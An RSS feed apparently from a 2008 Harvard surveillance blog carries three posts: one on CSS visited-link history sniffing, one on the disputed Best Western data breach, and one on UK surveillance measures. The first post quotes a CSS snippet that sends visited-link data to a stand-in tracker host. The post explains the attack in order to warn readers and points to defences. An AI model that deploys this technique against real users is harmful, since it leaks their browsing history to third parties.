<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
>

<channel>
	<title>An Eye on Surveillance &#187; privacy</title>
	<atom:link href="http://blogs.law.harvard.edu/surveillance/tag/privacy/feed/" rel="self" type="application/rss+xml" />
	<link>http://blogs.law.harvard.edu/surveillance</link>
	<description>from The Berkman Center for Internet &#38; Society at Harvard University</description>
	<lastBuildDate>Fri, 21 Nov 2008 18:49:38 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
		<item>
		<title>There Is No Privacy #1: Snooping Browsing History through HTML</title>
		<link>http://blogs.law.harvard.edu/surveillance/2008/11/17/there-is-no-privacy-1-snooping-browsing-history-through-html/</link>
		<comments>http://blogs.law.harvard.edu/surveillance/2008/11/17/there-is-no-privacy-1-snooping-browsing-history-through-html/#comments</comments>
		<pubDate>Mon, 17 Nov 2008 20:56:21 +0000</pubDate>
		<dc:creator>hal</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/surveillance/?p=11</guid>
		<description><![CDATA[Unless you have installed a couple of specific firefox extensions to protect yourself, the owners of any website you visit can tell whether you have visited any other website.
It has been known since 2006 that it is possible for any website to query whether you have visited any of a list of other websites [...]]]></description>
			<content:encoded><![CDATA[<p>Unless you have installed a couple of specific firefox extensions to protect yourself, the owners of any website you visit can tell whether you have visited any other website.</p>
<p>It has been known since 2006 that it is possible for any website to query whether you have visited any of a list of other websites without even having to use javascript.  <a href="https://www.indiana.edu/~phishing/browser-recon/">One way to do this</a> is to rely on the fact that CSS (the language for HTML style sheets used by virtually every website) allows website hosts to specify a different color or background image for a given link depending on whether that link has been visited before.  By specifying a URL on the snooping host as the background of a visited link, a snooping website can determine whether you have visited any given link, as demonstrated by this code snippet from the above page:</p>
<blockquote>
<pre>

   &lt;head&gt;
    [...]
    &lt;style type="text/css"&gt;
      #foo:visited{
         background: url(http://evil.eve.ws/tracker?who=alice&amp;what=somebank);
      }
    &lt;/style&gt;
    &lt;/head&gt;

    &lt;a id="foo" href="http://some.bank.com/login"&gt;&lt;/a&gt;
</pre>
</blockquote>
<p>To watch this attack in action, click on the &#8216;View all sites of interest&#8217; link on the right hand side of <a href="https://www.indiana.edu/~phishing/browser-recon/">this page</a> by Markus Jakobsson, Tom N. Jagatic, and Sid Stamm at the University of Indiana.  The authors of the page specifically suggest that this sort of attack could be used by phishers to figure out which bank to emulate to fool a user into logging into a fake bank page, but there are any number of different ways to use this information.  Felten and Schneider have <a href="http://www.cs.princeton.edu/sip/pub/webtiming.pdf">written about</a> a similar attack using cache timing that similarly gives access to a user&#8217;s browsing history.</p>
<p>Neither the link background attack nor the cache timing attack relies on javascript, the source of a large number of privacy attacks.  This freedom from javascript makes the attacks particularly effective, since one common (though highly inconvenient) method of securing a browser is to turn off javascript support.  Even those who choose to turn off javascript are not safe from these attacks.  There are <a href="http://crypto.stanford.edu/sameorigin/">firefox extensions</a> to protect against both attacks, but they are not widely used.  The developers of the core firefox browser have chosen not to include the code in those extensions in the base browser even though the attack has been well known among security geeks for a couple of years, with the result that the vast majority of users remain vulnerable to the attack.  The end result is that, unless you use firefox and install the above extensions or periodically purge your browser history, any website you visit can tell whether you have visited any other website.</p>
<p><b>Update:</b> The above extensions evidently don&#8217;t even work with firefox 3.0, though firefox 3.1 is reported to have a non-ui-accessible configuration setting that will block the visited link color by turning off the visited link feature altogether.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/surveillance/2008/11/17/there-is-no-privacy-1-snooping-browsing-history-through-html/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Best Western Data Breach as Shell Game</title>
		<link>http://blogs.law.harvard.edu/surveillance/2008/11/10/best-western-data-breach-as-shell-game/</link>
		<comments>http://blogs.law.harvard.edu/surveillance/2008/11/10/best-western-data-breach-as-shell-game/#comments</comments>
		<pubDate>Mon, 10 Nov 2008 04:52:09 +0000</pubDate>
		<dc:creator>hal</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[credit cards]]></category>
		<category><![CDATA[data breach]]></category>
		<category><![CDATA[privacy]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/surveillance/?p=6</guid>
		<description><![CDATA[On August 26, 2008, the Sunday Herald reported that a hacker had broken into the Best Western reservations system and stolen personal and financial data about eight million Best Western customers, including credit card numbers.  According to the report, the thief had installed a virus on the machine of an employee of a local [...]]]></description>
			<content:encoded><![CDATA[<p>On August 26, 2008, the Sunday Herald <a href="http://www.informationweek.com/shared/printableArticle.jhtml?articleID=210201325">reported</a> that a hacker had broken into the Best Western reservations system and stolen personal and financial data about eight million Best Western customers, including credit card numbers.  According to the report, the thief had installed a virus on the machine of an employee of a local hotel and used that virus to log the employee&#8217;s username and password for the hotel system.  With that login information, the thief had simply and quickly mined the hotel reservation system for all the information about all of Best Western&#8217;s customers.  The original report quoted a security expert as exclaiming that &#8220;there&#8217;s enough data there to spark a major European crime wave.&#8221;  Accustomed to a string of announcements about large scale data breaches, news media and blogs across the Internet amplified the report.</p>
<p>Almost immediately the CIO of Best Western posted a <a href="http://www.sundayherald.com/news/heraldnews/display.var.2432225.0.0.php#comments">comment</a> on the Sunday Herald story&#8217;s web page asserting that &#8220;This story is grossly unsubstantiated! &#8230; This has affected only ten customers who we are currently being contacted to offer our assistance, none of these were GB customers.&#8221;  Within a couple of days, Information Week posted an <a href="http://www.informationweek.com/shared/printableArticle.jhtml?articleID=210201325">interview</a> with the CIO of Best Western, in which he argued that individual hotel clerks have access only to accounts for their local hotels, that credit card information is deleted from the system within seven days of use, and that the reporter of the original story had basically made up the eight million number out of whole cloth.  Neither the Sunday Herald nor the original reporter has amended the story or commented on the claims that they exaggerated the problem.  The reporter claimed to have screenshots that showed the entire database of eight million accounts but has not posted those screenshots or further evidence of a large scale data breach.</p>
<p>Notwithstanding the well established habit for companies to attempt to minimize the importance of their data breaches, the bulk of the evidence suggests that the Best Western side of the story is much more likely to be closer to the truth.  Hacker or no hacker, it would be egregious to allow a single hotel clerk from a local hotel access to the credit card details of every single Best Western customer.  Likewise, it would be horrible security practice not to monitor access to sensitive customer information by authorized users (as the CIO claims that his systems were doing).  With thousands of such local clerks, it would be inevitable that some of them would fall to the temptation of stealing account information without need for any sophisticated software.  This is not to say that such a data breach is not possible or that more egregious data breaches have not happened.  But without more evidence, it seems very likely that the original reporter got carried away and assumed a much greater breach than actually happened.</p>
<p>What&#8217;s interesting about the case is the difficulty of telling exactly what happened and what that difficulty says about the state of security and privacy online.  Despite claims of a massive crime wave, the system of social insurance set up around credit cards is able to handle large scale breaches of account information without widely visible effects on customers.  For example, the <a href="http://www.informationweek.com/shared/printableArticle.jhtml?articleID=198701100">2007 T. J. Maxx data breach</a> exposed more than 45 million credit card numbers.  The FBI reported millions of dollars in theft from Walmart, but that level of theft is line noise within the total credit card sales for Walmart, let alone for all credit card transactions.</p>
<p>The card companies are able to detect fraudulent card uses in many or most cases and either refuse them or charge them back to the merchants (resulting in higher prices by the merchants).  Thieves are more likely to charge small amounts to large numbers of cards than large amounts to individual cards to avoid notice, further mitigating the amount of damage done.  Fraudulent charges that are noticed by customers are eaten by the card companies (and passed on in large part to customers as credit card charges), and those that are not are simply eaten by the customers.  But again the charges that are most likely not to be noticed are small ones.  The card companies don&#8217;t want customers to feel that their cards are not secure, so they do not widely publish this information to customers, but the industry is structured simply to eat some small percentage of fraudulent charges simply as the price of using credit cards widely.</p>
<p>Because of large scale data breaches and the general insecurity of our current computing / Internet infrastructure, credit card numbers at this point are basically an advisory security feature.  They are just secret enough to let other folks know that it is wrong to use them, but not secret enough to stop a bad guy from getting access to them.  The credit card companies have a strong vested interest, however, in the idea that credit cards are strongly secure, because customers will stop using them if they feel they can&#8217;t be trusted.  So they encourage the idea that credit cards are secure, while implementing strong mechanisms on the back end (such as increasingly aggressive fraud detection algorithms) to deal with the fact that they are not.  </p>
<p>Massive credit card breaches like the T. J. Maxx case and the alleged Best Western case highlight the nature of this shell game, though.  The system can absorb the loss of tens of millions of card numbers with little or no impact to end customers en masse.  But because the credit card companies have this interest in hiding what&#8217;s actually happening, it&#8217;s very difficult to decode these cases.  They fade into the background in one way or another &#8212; either because there was no data breach or because the system of social insurance created by the credit card companies absorbs the costs with little real impact on end customers.  The only thing we can tell from the cases is the shell game nature of credit card numbers (and online privacy in general, but that&#8217;s an argument for further posts!).</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/surveillance/2008/11/10/best-western-data-breach-as-shell-game/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Handheld fingerprint readers and the British surveillance state</title>
		<link>http://blogs.law.harvard.edu/surveillance/2008/10/29/handheld-fingerprint-readers-and-the-british-surveillance-state/</link>
		<comments>http://blogs.law.harvard.edu/surveillance/2008/10/29/handheld-fingerprint-readers-and-the-british-surveillance-state/#comments</comments>
		<pubDate>Wed, 29 Oct 2008 16:49:41 +0000</pubDate>
		<dc:creator>csoghoian</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[fingerprints]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[surveillance state]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/surveillance/?p=4</guid>
		<description><![CDATA[Hundreds of years ago, with the passage of the Magna Carta, Great Britain took a bold step in outlining basic civil liberties for the common man. Unfortunately, over the past few years, the UK has switched from being a basic rights trend-setter, to a surveillance innovator. What ever happened?
Last year, a troubling new law came [...]]]></description>
			<content:encoded><![CDATA[<p>Hundreds of years ago, with the passage of the Magna Carta, Great Britain took a bold step in outlining basic civil liberties for the common man. Unfortunately, over the past few years, the UK has switched from being a basic rights trend-setter, to a surveillance innovator. What ever happened?</p>
<p>Last year, a troubling new law came into effect which makes it a criminal offense to refuse to hand over one&#8217;s encryption key to law  enforcement engaged in a &#8216;legitimate&#8217; investigation. This was tested out in court a couple weeks ago, and unfortunately, the right to privacy lost. As <a href="http://arstechnica.com/news.ars/post/20081020-your-privacy-is-an-illusion-uk-attacks-civil-liberties.html">Ars Technica described</a>:</p>
<blockquote><p>The Court stated that although there was a right to not self-incriminate, this was not absolute, and that the &#8220;public interest&#8221; can supersede this right in some circumstances.</p></blockquote>
<p>Just last week, the British government <a href="http://www.nowpublic.com/tech-biz/passports-will-be-needed-buy-mobile-phones-uk">floated a proposal</a> to require that a passport be shown in order to purchase a mobile phone or SIM card. After all, what&#8217;s the point in spending all that money <a href="http://arstechnica.com/news.ars/post/20080522-uk-to-streamline-identity-fraud-with-data-retention-proposal.html">recording calls</a> and <a href="http://news.cnet.com/8301-13739_3-10030134-46.html">real-time location information</a> if you can&#8217;t be sure who is speaking on the other end of the line?</p>
<p>Finally, the latest nail in the privacy coffin has been announced: Starting in 2009, British police will be issued <a href="http://www.belfasttelegraph.co.uk/news/local-national/handheld-fingerprint-scanners-to-be-used-in-uk-from-2009-14017418.html">hand-held fingerprint readers</a>, connected to a central server via a wireless/cellular connection. Given the existing (and troubling) powers that police have to arbitrarily <a href="http://www.wsws.org/articles/2008/feb2008/poli-f13.shtml">stop and question people in the street</a> due to &#8220;terrorism&#8221; concerns, this&#8217;ll allow them to immediately determine someone&#8217;s identity on the spot, with or without a national ID card.</p>
<p>Thankfully, it isn&#8217;t yet a crime to not have working fingerprints. Thus, it&#8217;s quite easy to imagine the privacy-aware crowd turning to acid, glue or other techniques to erase the ridges and swirls from their own fingertips.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/surveillance/2008/10/29/handheld-fingerprint-readers-and-the-british-surveillance-state/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
	</channel>
</rss>
